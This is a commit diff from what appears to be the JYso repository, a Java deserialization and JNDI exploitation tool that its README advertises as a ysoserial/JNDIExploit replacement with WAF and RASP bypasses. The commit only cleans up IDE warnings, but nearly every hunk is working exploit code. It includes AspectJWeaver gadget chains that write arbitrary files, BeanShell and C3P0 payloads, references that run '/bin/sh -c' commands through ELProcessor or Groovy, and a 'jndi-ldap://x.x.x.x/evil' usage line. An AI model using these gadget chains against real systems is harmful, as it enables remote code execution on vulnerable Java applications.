mirror of
https://github.com/qi4L/JYso.git
synced 2026-09-21 22:40:43 +08:00
fix:修复大量IDEA给出的告警,提高代码健壮性
This commit is contained in:
@@ -1,16 +1,16 @@
|
|||||||
<p align="center">
|
<p style="text-align: center;">
|
||||||
<img src="docs/img/logo.png" width="120">
|
<img src="docs/img/logo.png" width="465" alt="">
|
||||||
</p>
|
</p>
|
||||||
<h1 align="center"> JYso </h1>
|
<h1 style="text-align: center;"> JYso </h1>
|
||||||
|
|
||||||
<p align="center">
|
<p style="text-align: center;">
|
||||||
<img src="https://img.shields.io/badge/JDK-1.8+-orange" />
|
<img src="https://img.shields.io/badge/JDK-1.8+-orange" alt=""/>
|
||||||
<img src="https://img.shields.io/badge/gradle-8.7-blue" />
|
<img src="https://img.shields.io/badge/gradle-8.7-blue" alt=""/>
|
||||||
<img src="https://img.shields.io/badge/SDL-Groovy-green" />
|
<img src="https://img.shields.io/badge/SDL-Groovy-green" alt=""/>
|
||||||
|
|
||||||
<p align="center"> 可以同时当做 ysoserial 与 JNDIExploit 使用的工具,同时具备多种JNDI高版本、WAF、RASP的Bypass功能 </p>
|
<p style="text-align: center;"> 可以同时当做 ysoserial 与 JNDIExploit 使用的工具,同时具备多种JNDI高版本、WAF、RASP的Bypass功能 </p>
|
||||||
|
|
||||||
<p align="center"> 中文文档 | <a href="README.en.md">English</a> </p>
|
<p style="text-align: center;"> 中文文档 | <a href="README.en.md">English</a> </p>
|
||||||
|
|
||||||
## 🚀 上手指南
|
## 🚀 上手指南
|
||||||
|
|
||||||
@@ -53,7 +53,7 @@
|
|||||||
|
|
||||||
## ✨ CTStack
|
## ✨ CTStack
|
||||||
|
|
||||||
<img src="https://ctstack-oss.oss-cn-beijing.aliyuncs.com/CT%20Stack-2.png" width="30%" />
|
<img src="https://ctstack-oss.oss-cn-beijing.aliyuncs.com/CT%20Stack-2.png" width="30%" alt=""/>
|
||||||
|
|
||||||
JYso 现已加入 [CTStack](https://stack.chaitin.com/tool/detail/1303) 社区
|
JYso 现已加入 [CTStack](https://stack.chaitin.com/tool/detail/1303) 社区
|
||||||
|
|
||||||
|
|||||||
@@ -5,7 +5,6 @@ import com.qi4l.JYso.exceptions.IncorrectParamsException;
|
|||||||
import com.qi4l.JYso.exceptions.UnSupportedPayloadTypeException;
|
import com.qi4l.JYso.exceptions.UnSupportedPayloadTypeException;
|
||||||
import com.qi4l.JYso.gadgets.Config.Config;
|
import com.qi4l.JYso.gadgets.Config.Config;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
||||||
import com.qi4l.JYso.gadgets.utils.InjShell;
|
|
||||||
import com.qi4l.JYso.gadgets.utils.Utils;
|
import com.qi4l.JYso.gadgets.utils.Utils;
|
||||||
import com.qi4l.JYso.gadgets.utils.handle.ClassNameHandler;
|
import com.qi4l.JYso.gadgets.utils.handle.ClassNameHandler;
|
||||||
import com.qi4l.JYso.template.Meterpreter;
|
import com.qi4l.JYso.template.Meterpreter;
|
||||||
|
|||||||
@@ -18,7 +18,7 @@ import java.rmi.server.Operation;
|
|||||||
import java.rmi.server.RemoteObject;
|
import java.rmi.server.RemoteObject;
|
||||||
import java.rmi.server.RemoteRef;
|
import java.rmi.server.RemoteRef;
|
||||||
import java.util.*;
|
import java.util.*;
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
public class RMIBindExploit {
|
public class RMIBindExploit {
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -11,11 +11,11 @@ import org.apache.commons.collections.map.LazyMap;
|
|||||||
|
|
||||||
import java.io.Serializable;
|
import java.io.Serializable;
|
||||||
import java.lang.reflect.Constructor;
|
import java.lang.reflect.Constructor;
|
||||||
import java.lang.reflect.Field;
|
|
||||||
import java.util.HashMap;
|
|
||||||
import java.util.HashSet;
|
|
||||||
import java.util.Map;
|
import java.util.Map;
|
||||||
|
|
||||||
|
import static com.qi4l.JYso.gadgets.AspectJWeaver2.getSerializableCC6;
|
||||||
|
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Gadget chain:
|
* Gadget chain:
|
||||||
* HashSet.readObject()
|
* HashSet.readObject()
|
||||||
@@ -37,10 +37,9 @@ import java.util.Map;
|
|||||||
* <a href="https://medium.com/nightst0rm/t%C3%B4i-%C4%91%C3%A3-chi%E1%BA%BFm-quy%E1%BB%81n-%C4%91i%E1%BB%81u-khi%E1%BB%83n-c%E1%BB%A7a-r%E1%BA%A5t-nhi%E1%BB%81u-trang-web-nh%C6%B0-th%E1%BA%BF-n%C3%A0o-61efdf4a03f5">...</a>
|
* <a href="https://medium.com/nightst0rm/t%C3%B4i-%C4%91%C3%A3-chi%E1%BA%BFm-quy%E1%BB%81n-%C4%91i%E1%BB%81u-khi%E1%BB%83n-c%E1%BB%A7a-r%E1%BA%A5t-nhi%E1%BB%81u-trang-web-nh%C6%B0-th%E1%BA%BF-n%C3%A0o-61efdf4a03f5">...</a>
|
||||||
*/
|
*/
|
||||||
|
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings("unused")
|
||||||
@Dependencies({"org.aspectj:aspectjweaver:1.9.2", "commons-collections:commons-collections:3.2.2"})
|
@Dependencies({"org.aspectj:aspectjweaver:1.9.2", "commons-collections:commons-collections:3.2.2"})
|
||||||
@Authors({Authors.JANG})
|
@Authors({Authors.JANG})
|
||||||
|
|
||||||
public class AspectJWeaver implements ObjectPayload<Serializable> {
|
public class AspectJWeaver implements ObjectPayload<Serializable> {
|
||||||
|
|
||||||
public Serializable getObject(String command) throws Exception {
|
public Serializable getObject(String command) throws Exception {
|
||||||
@@ -52,49 +51,14 @@ public class AspectJWeaver implements ObjectPayload<Serializable> {
|
|||||||
String[] parts = command.split(":");
|
String[] parts = command.split(":");
|
||||||
String filename = parts[0];
|
String filename = parts[0];
|
||||||
byte[] content = Base64.decodeBase64(parts[1]);
|
byte[] content = Base64.decodeBase64(parts[1]);
|
||||||
|
|
||||||
Constructor<?> ctor = Reflections.getFirstCtor("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap");
|
Constructor<?> ctor = Reflections.getFirstCtor("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap");
|
||||||
|
|
||||||
Object simpleCache = ctor.newInstance(".", 12);
|
Object simpleCache = ctor.newInstance(".", 12);
|
||||||
Transformer ct = new ConstantTransformer(content);
|
Transformer ct = new ConstantTransformer(content);
|
||||||
Map lazyMap = LazyMap.decorate((Map) simpleCache, ct);
|
|
||||||
|
Map<?,?> lazyMap = LazyMap.decorate((Map<?,?>) simpleCache, ct);
|
||||||
TiedMapEntry entry = new TiedMapEntry(lazyMap, filename);
|
TiedMapEntry entry = new TiedMapEntry(lazyMap, filename);
|
||||||
HashSet map = new HashSet(1);
|
|
||||||
map.add("QI4L");
|
|
||||||
Field f;
|
|
||||||
try {
|
|
||||||
f = HashSet.class.getDeclaredField("map");
|
|
||||||
} catch (NoSuchFieldException e) {
|
|
||||||
f = HashSet.class.getDeclaredField("backingMap");
|
|
||||||
}
|
|
||||||
|
|
||||||
Reflections.setAccessible(f);
|
return getSerializableCC6(entry);
|
||||||
HashMap innimpl = (HashMap) f.get(map);
|
|
||||||
|
|
||||||
Field f2;
|
|
||||||
try {
|
|
||||||
f2 = HashMap.class.getDeclaredField("table");
|
|
||||||
} catch (NoSuchFieldException e) {
|
|
||||||
f2 = HashMap.class.getDeclaredField("elementData");
|
|
||||||
}
|
|
||||||
|
|
||||||
Reflections.setAccessible(f2);
|
|
||||||
Object[] array = (Object[]) f2.get(innimpl);
|
|
||||||
|
|
||||||
Object node = array[0];
|
|
||||||
if (node == null) {
|
|
||||||
node = array[1];
|
|
||||||
}
|
|
||||||
|
|
||||||
Field keyField;
|
|
||||||
try {
|
|
||||||
keyField = node.getClass().getDeclaredField("key");
|
|
||||||
} catch (Exception e) {
|
|
||||||
keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
|
|
||||||
}
|
|
||||||
|
|
||||||
Reflections.setAccessible(keyField);
|
|
||||||
keyField.set(node, entry);
|
|
||||||
|
|
||||||
return map;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -22,7 +22,7 @@ import java.util.Map;
|
|||||||
* 使用 ConstantFactory + FactoryTransformer 替换 ConstantTransformer,避免,类似本项目中的 CC10
|
* 使用 ConstantFactory + FactoryTransformer 替换 ConstantTransformer,避免,类似本项目中的 CC10
|
||||||
*/
|
*/
|
||||||
|
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"org.aspectj:aspectjweaver:1.9.2", "commons-collections:commons-collections:3.2.2"})
|
@Dependencies({"org.aspectj:aspectjweaver:1.9.2", "commons-collections:commons-collections:3.2.2"})
|
||||||
@Authors({Authors.QI4L})
|
@Authors({Authors.QI4L})
|
||||||
public class AspectJWeaver2 implements ObjectPayload<Serializable> {
|
public class AspectJWeaver2 implements ObjectPayload<Serializable> {
|
||||||
@@ -37,31 +37,38 @@ public class AspectJWeaver2 implements ObjectPayload<Serializable> {
|
|||||||
String[] parts = command.split(";");
|
String[] parts = command.split(";");
|
||||||
String filename = parts[0];
|
String filename = parts[0];
|
||||||
byte[] content = Base64.decodeBase64(parts[1]);
|
byte[] content = Base64.decodeBase64(parts[1]);
|
||||||
|
Constructor<?> ctor = Reflections.getFirstCtor("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap");
|
||||||
Constructor ctor = Reflections.getFirstCtor("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap");
|
|
||||||
Object simpleCache = ctor.newInstance(".", 12);
|
Object simpleCache = ctor.newInstance(".", 12);
|
||||||
|
|
||||||
Factory ft = new ConstantFactory(content);
|
Factory ft = new ConstantFactory(content);
|
||||||
Transformer ct = new FactoryTransformer(ft);
|
Transformer ct = new FactoryTransformer(ft);
|
||||||
|
|
||||||
Map lazyMap = LazyMap.decorate((Map) simpleCache, ct);
|
Map<?,?> lazyMap = LazyMap.decorate((Map<?,?>) simpleCache, ct);
|
||||||
TiedMapEntry entry = new TiedMapEntry(lazyMap, filename);
|
TiedMapEntry entry = new TiedMapEntry(lazyMap, filename);
|
||||||
HashSet map = new HashSet(1);
|
|
||||||
|
return getSerializableCC6(entry);
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
static Serializable getSerializableCC6(TiedMapEntry entry) throws NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
|
||||||
|
HashSet<String> map = new HashSet<>(1);
|
||||||
map.add("QI4L");
|
map.add("QI4L");
|
||||||
Field f = null;
|
Field f;
|
||||||
try {
|
try {
|
||||||
f = HashSet.class.getDeclaredField("map");
|
f = HashSet.class.getDeclaredField("map");
|
||||||
} catch (NoSuchFieldException e) {
|
} catch (NoSuchFieldException e) {
|
||||||
|
//noinspection JavaReflectionMemberAccess
|
||||||
f = HashSet.class.getDeclaredField("backingMap");
|
f = HashSet.class.getDeclaredField("backingMap");
|
||||||
}
|
}
|
||||||
|
|
||||||
Reflections.setAccessible(f);
|
Reflections.setAccessible(f);
|
||||||
HashMap innimpl = (HashMap) f.get(map);
|
HashMap<?,?> innimpl = (HashMap<?,?>) f.get(map);
|
||||||
|
|
||||||
Field f2 = null;
|
Field f2;
|
||||||
try {
|
try {
|
||||||
f2 = HashMap.class.getDeclaredField("table");
|
f2 = HashMap.class.getDeclaredField("table");
|
||||||
} catch (NoSuchFieldException e) {
|
} catch (NoSuchFieldException e) {
|
||||||
|
//noinspection JavaReflectionMemberAccess
|
||||||
f2 = HashMap.class.getDeclaredField("elementData");
|
f2 = HashMap.class.getDeclaredField("elementData");
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -73,7 +80,7 @@ public class AspectJWeaver2 implements ObjectPayload<Serializable> {
|
|||||||
node = array[1];
|
node = array[1];
|
||||||
}
|
}
|
||||||
|
|
||||||
Field keyField = null;
|
Field keyField;
|
||||||
try {
|
try {
|
||||||
keyField = node.getClass().getDeclaredField("key");
|
keyField = node.getClass().getDeclaredField("key");
|
||||||
} catch (Exception e) {
|
} catch (Exception e) {
|
||||||
@@ -84,6 +91,5 @@ public class AspectJWeaver2 implements ObjectPayload<Serializable> {
|
|||||||
keyField.set(node, entry);
|
keyField.set(node, entry);
|
||||||
|
|
||||||
return map;
|
return map;
|
||||||
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -16,7 +16,7 @@ import java.util.PriorityQueue;
|
|||||||
* Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
|
* Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
|
||||||
*/
|
*/
|
||||||
|
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"org.beanshell:bsh:2.0b5"})
|
@Dependencies({"org.beanshell:bsh:2.0b5"})
|
||||||
@Authors({Authors.PWNTESTER, Authors.CSCHNEIDER4711})
|
@Authors({Authors.PWNTESTER, Authors.CSCHNEIDER4711})
|
||||||
public class BeanShell1 implements ObjectPayload<PriorityQueue> {
|
public class BeanShell1 implements ObjectPayload<PriorityQueue> {
|
||||||
@@ -30,10 +30,10 @@ public class BeanShell1 implements ObjectPayload<PriorityQueue> {
|
|||||||
InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);
|
InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);
|
||||||
Comparator<? super Object> comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class[]{Comparator.class}, handler);
|
Comparator<? super Object> comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class[]{Comparator.class}, handler);
|
||||||
PriorityQueue<Object> priorityQueue = new PriorityQueue(2, comparator);
|
PriorityQueue<Object> priorityQueue = new PriorityQueue(2, comparator);
|
||||||
Object[] queue = {Integer.valueOf(1), Integer.valueOf(1)};
|
Object[] queue = {1, 1};
|
||||||
|
|
||||||
Reflections.setFieldValue(priorityQueue, "queue", queue);
|
Reflections.setFieldValue(priorityQueue, "queue", queue);
|
||||||
Reflections.setFieldValue(priorityQueue, "size", Integer.valueOf(2));
|
Reflections.setFieldValue(priorityQueue, "size", 2);
|
||||||
return priorityQueue;
|
return priorityQueue;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -14,7 +14,7 @@ import java.util.PriorityQueue;
|
|||||||
* Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
|
* Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
|
||||||
*/
|
*/
|
||||||
|
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"org.beanshell:bsh:2.0b1"})
|
@Dependencies({"org.beanshell:bsh:2.0b1"})
|
||||||
@Authors({Authors.KILLER})
|
@Authors({Authors.KILLER})
|
||||||
public class BeanShell2 implements ObjectPayload<PriorityQueue> {
|
public class BeanShell2 implements ObjectPayload<PriorityQueue> {
|
||||||
@@ -28,10 +28,10 @@ public class BeanShell2 implements ObjectPayload<PriorityQueue> {
|
|||||||
setu.invoke(i, "bsh.cwd", ".");
|
setu.invoke(i, "bsh.cwd", ".");
|
||||||
i.eval(payload);
|
i.eval(payload);
|
||||||
|
|
||||||
Class<?> xthis = Class.forName("bsh.XThis");
|
Class<?> xThis = Class.forName("bsh.XThis");
|
||||||
Field handlerField = xthis.getDeclaredField("invocationHandler");
|
Field handlerField = xThis.getDeclaredField("invocationHandler");
|
||||||
handlerField.setAccessible(true);
|
handlerField.setAccessible(true);
|
||||||
Constructor<?> xthisDeclaredConstructor = xthis.getDeclaredConstructor(NameSpace.class, Interpreter.class);
|
Constructor<?> xthisDeclaredConstructor = xThis.getDeclaredConstructor(NameSpace.class, Interpreter.class);
|
||||||
xthisDeclaredConstructor.setAccessible(true);
|
xthisDeclaredConstructor.setAccessible(true);
|
||||||
Object xt = xthisDeclaredConstructor.newInstance(i.getNameSpace(), i);
|
Object xt = xthisDeclaredConstructor.newInstance(i.getNameSpace(), i);
|
||||||
handlerField.setAccessible(true);
|
handlerField.setAccessible(true);
|
||||||
|
|||||||
@@ -6,14 +6,11 @@ import com.qi4l.JYso.gadgets.annotation.Authors;
|
|||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
|
|
||||||
import javax.naming.NamingException;
|
|
||||||
import javax.naming.Reference;
|
import javax.naming.Reference;
|
||||||
import javax.naming.Referenceable;
|
import javax.naming.Referenceable;
|
||||||
import javax.sql.ConnectionPoolDataSource;
|
import javax.sql.ConnectionPoolDataSource;
|
||||||
import javax.sql.PooledConnection;
|
import javax.sql.PooledConnection;
|
||||||
import java.io.PrintWriter;
|
import java.io.PrintWriter;
|
||||||
import java.sql.SQLException;
|
|
||||||
import java.sql.SQLFeatureNotSupportedException;
|
|
||||||
import java.util.logging.Logger;
|
import java.util.logging.Logger;
|
||||||
|
|
||||||
/**
|
/**
|
||||||
@@ -30,6 +27,7 @@ import java.util.logging.Logger;
|
|||||||
* @author mbechler
|
* @author mbechler
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.mchange:mchange-commons-java:0.2.11"})
|
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.mchange:mchange-commons-java:0.2.11"})
|
||||||
@Authors({Authors.MBECHLER})
|
@Authors({Authors.MBECHLER})
|
||||||
public class C3P0 implements ObjectPayload<Object> {
|
public class C3P0 implements ObjectPayload<Object> {
|
||||||
@@ -60,33 +58,33 @@ public class C3P0 implements ObjectPayload<Object> {
|
|||||||
this.url = url;
|
this.url = url;
|
||||||
}
|
}
|
||||||
|
|
||||||
public Reference getReference() throws NamingException {
|
public Reference getReference() {
|
||||||
return new Reference("exploit", this.className, this.url);
|
return new Reference("exploit", this.className, this.url);
|
||||||
}
|
}
|
||||||
|
|
||||||
public PrintWriter getLogWriter() throws SQLException {
|
public PrintWriter getLogWriter() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public void setLogWriter(PrintWriter out) throws SQLException {
|
public void setLogWriter(PrintWriter out) {
|
||||||
}
|
}
|
||||||
|
|
||||||
public int getLoginTimeout() throws SQLException {
|
public int getLoginTimeout() {
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
public void setLoginTimeout(int seconds) throws SQLException {
|
public void setLoginTimeout(int seconds) {
|
||||||
}
|
}
|
||||||
|
|
||||||
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
|
public Logger getParentLogger() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PooledConnection getPooledConnection() throws SQLException {
|
public PooledConnection getPooledConnection() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PooledConnection getPooledConnection(String user, String password) throws SQLException {
|
public PooledConnection getPooledConnection(String user, String password) {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -7,15 +7,12 @@ import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
|||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import org.apache.naming.ResourceRef;
|
import org.apache.naming.ResourceRef;
|
||||||
|
|
||||||
import javax.naming.NamingException;
|
|
||||||
import javax.naming.Reference;
|
import javax.naming.Reference;
|
||||||
import javax.naming.Referenceable;
|
import javax.naming.Referenceable;
|
||||||
import javax.naming.StringRefAddr;
|
import javax.naming.StringRefAddr;
|
||||||
import javax.sql.ConnectionPoolDataSource;
|
import javax.sql.ConnectionPoolDataSource;
|
||||||
import javax.sql.PooledConnection;
|
import javax.sql.PooledConnection;
|
||||||
import java.io.PrintWriter;
|
import java.io.PrintWriter;
|
||||||
import java.sql.SQLException;
|
|
||||||
import java.sql.SQLFeatureNotSupportedException;
|
|
||||||
import java.util.logging.Logger;
|
import java.util.logging.Logger;
|
||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.getJSEngineValue;
|
import static com.qi4l.JYso.gadgets.utils.Utils.getJSEngineValue;
|
||||||
@@ -25,6 +22,7 @@ import static com.qi4l.JYso.gadgets.utils.handle.GlassHandler.generateClass;
|
|||||||
* C3P02 通过Tomcat 的 getObjectInstance 方法调用 ELProcessor 的 eval 方法实现表达式注入
|
* C3P02 通过Tomcat 的 getObjectInstance 方法调用 ELProcessor 的 eval 方法实现表达式注入
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.mchange:mchange-commons-java:0.2.11", "org.apache:tomcat:8.5.35"})
|
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.mchange:mchange-commons-java:0.2.11", "org.apache:tomcat:8.5.35"})
|
||||||
@Authors({Authors.QI4L})
|
@Authors({Authors.QI4L})
|
||||||
public class C3P02 implements ObjectPayload<Object> {
|
public class C3P02 implements ObjectPayload<Object> {
|
||||||
@@ -50,36 +48,36 @@ public class C3P02 implements ObjectPayload<Object> {
|
|||||||
this.cmd = cmd;
|
this.cmd = cmd;
|
||||||
}
|
}
|
||||||
|
|
||||||
public Reference getReference() throws NamingException {
|
public Reference getReference() {
|
||||||
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
|
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
|
||||||
ref.add(new StringRefAddr("forceString", "QI4L=eval"));
|
ref.add(new StringRefAddr("forceString", "QI4L=eval"));
|
||||||
ref.add(new StringRefAddr("QI4L", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','" + cmd + "']).start()\")"));
|
ref.add(new StringRefAddr("QI4L", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','" + cmd + "']).start()\")"));
|
||||||
return ref;
|
return ref;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PrintWriter getLogWriter() throws SQLException {
|
public PrintWriter getLogWriter() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public void setLogWriter(PrintWriter out) throws SQLException {
|
public void setLogWriter(PrintWriter out) {
|
||||||
}
|
}
|
||||||
|
|
||||||
public int getLoginTimeout() throws SQLException {
|
public int getLoginTimeout() {
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
public void setLoginTimeout(int seconds) throws SQLException {
|
public void setLoginTimeout(int seconds) {
|
||||||
}
|
}
|
||||||
|
|
||||||
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
|
public Logger getParentLogger() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PooledConnection getPooledConnection() throws SQLException {
|
public PooledConnection getPooledConnection() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PooledConnection getPooledConnection(String user, String password) throws SQLException {
|
public PooledConnection getPooledConnection(String user, String password) {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -7,21 +7,19 @@ import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
|||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import org.apache.naming.ResourceRef;
|
import org.apache.naming.ResourceRef;
|
||||||
|
|
||||||
import javax.naming.NamingException;
|
|
||||||
import javax.naming.Reference;
|
import javax.naming.Reference;
|
||||||
import javax.naming.Referenceable;
|
import javax.naming.Referenceable;
|
||||||
import javax.naming.StringRefAddr;
|
import javax.naming.StringRefAddr;
|
||||||
import javax.sql.ConnectionPoolDataSource;
|
import javax.sql.ConnectionPoolDataSource;
|
||||||
import javax.sql.PooledConnection;
|
import javax.sql.PooledConnection;
|
||||||
import java.io.PrintWriter;
|
import java.io.PrintWriter;
|
||||||
import java.sql.SQLException;
|
|
||||||
import java.sql.SQLFeatureNotSupportedException;
|
|
||||||
import java.util.logging.Logger;
|
import java.util.logging.Logger;
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* 同 C3P0 2 只不过使用了 Groovy
|
* 同 C3P0 2 只不过使用了 Groovy
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.mchange:mchange-commons-java:0.2.11", "org.apache:tomcat:8.5.35", "org.codehaus.groovy:groovy:2.3.9"})
|
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.mchange:mchange-commons-java:0.2.11", "org.apache:tomcat:8.5.35", "org.codehaus.groovy:groovy:2.3.9"})
|
||||||
@Authors({Authors.QI4L})
|
@Authors({Authors.QI4L})
|
||||||
public class C3P03 implements ObjectPayload<Object> {
|
public class C3P03 implements ObjectPayload<Object> {
|
||||||
@@ -42,36 +40,36 @@ public class C3P03 implements ObjectPayload<Object> {
|
|||||||
this.cmd = cmd;
|
this.cmd = cmd;
|
||||||
}
|
}
|
||||||
|
|
||||||
public Reference getReference() throws NamingException {
|
public Reference getReference() {
|
||||||
ResourceRef ref = new ResourceRef("groovy.lang.GroovyShell", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
|
ResourceRef ref = new ResourceRef("groovy.lang.GroovyShell", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
|
||||||
ref.add(new StringRefAddr("forceString", "QI4L=evaluate"));
|
ref.add(new StringRefAddr("forceString", "QI4L=evaluate"));
|
||||||
ref.add(new StringRefAddr("QI4L", "'" + cmd + "'.execute()"));
|
ref.add(new StringRefAddr("QI4L", "'" + cmd + "'.execute()"));
|
||||||
return ref;
|
return ref;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PrintWriter getLogWriter() throws SQLException {
|
public PrintWriter getLogWriter() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public void setLogWriter(PrintWriter out) throws SQLException {
|
public void setLogWriter(PrintWriter out) {
|
||||||
}
|
}
|
||||||
|
|
||||||
public int getLoginTimeout() throws SQLException {
|
public int getLoginTimeout() {
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
public void setLoginTimeout(int seconds) throws SQLException {
|
public void setLoginTimeout(int seconds) {
|
||||||
}
|
}
|
||||||
|
|
||||||
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
|
public Logger getParentLogger() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PooledConnection getPooledConnection() throws SQLException {
|
public PooledConnection getPooledConnection() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PooledConnection getPooledConnection(String user, String password) throws SQLException {
|
public PooledConnection getPooledConnection(String user, String password) {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -8,7 +8,6 @@ import com.qi4l.JYso.gadgets.utils.HexUtils;
|
|||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import org.apache.naming.ResourceRef;
|
import org.apache.naming.ResourceRef;
|
||||||
|
|
||||||
import javax.naming.NamingException;
|
|
||||||
import javax.naming.Reference;
|
import javax.naming.Reference;
|
||||||
import javax.naming.Referenceable;
|
import javax.naming.Referenceable;
|
||||||
import javax.naming.StringRefAddr;
|
import javax.naming.StringRefAddr;
|
||||||
@@ -18,8 +17,6 @@ import java.io.IOException;
|
|||||||
import java.io.PrintWriter;
|
import java.io.PrintWriter;
|
||||||
import java.nio.file.Files;
|
import java.nio.file.Files;
|
||||||
import java.nio.file.Paths;
|
import java.nio.file.Paths;
|
||||||
import java.sql.SQLException;
|
|
||||||
import java.sql.SQLFeatureNotSupportedException;
|
|
||||||
import java.util.logging.Logger;
|
import java.util.logging.Logger;
|
||||||
|
|
||||||
/**
|
/**
|
||||||
@@ -42,6 +39,7 @@ import java.util.logging.Logger;
|
|||||||
* C3P04 'jndi-ldap://x.x.x.x/evil'
|
* C3P04 'jndi-ldap://x.x.x.x/evil'
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.mchange:mchange-commons-java:0.2.11", "org.apache:tomcat:8.5.35", "org.yaml:snakeyaml:1.30"})
|
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.mchange:mchange-commons-java:0.2.11", "org.apache:tomcat:8.5.35", "org.yaml:snakeyaml:1.30"})
|
||||||
@Authors({Authors.QI4L})
|
@Authors({Authors.QI4L})
|
||||||
public class C3P04 implements ObjectPayload<Object> {
|
public class C3P04 implements ObjectPayload<Object> {
|
||||||
